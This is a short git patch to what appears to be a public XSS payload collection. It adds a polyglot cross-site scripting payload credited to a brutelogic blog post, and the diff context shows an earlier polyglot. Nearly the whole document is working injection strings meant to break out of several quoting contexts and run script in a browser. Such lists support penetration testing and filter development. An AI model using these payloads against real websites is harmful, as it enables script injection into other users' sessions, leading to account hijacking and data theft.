From 88134256c81bbe637f05a3646838467ce56b7b09 Mon Sep 17 00:00:00 2001 From: clem9669 <18504086+clem9669@users.noreply.github.com> Date: Tue, 13 Sep 2022 11:58:10 +0000 Subject: [PATCH] Adding brutelogic polyglot Adding brutelogic polyglot from blog post. --- XSS Injection/README.md | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/XSS Injection/README.md b/XSS Injection/README.md index 7f69397..44b9b06 100644 --- a/XSS Injection/README.md +++ b/XSS Injection/README.md @@ -629,6 +629,11 @@ javascript:"/*\"/*`/*' /*<svg/onload='/*-->` ``` +Polyglot XSS - from [brutelogic](https://brutelogic.com.br/blog/building-xss-polyglots/) +```javascript +JavaScript://%250Aalert?.(1)//'/*\'/*"/*\"/*`/*\`/*%26apos;)/*\74k +``` + ## Filter Bypass and exotic payloads ### Bypass case sensitive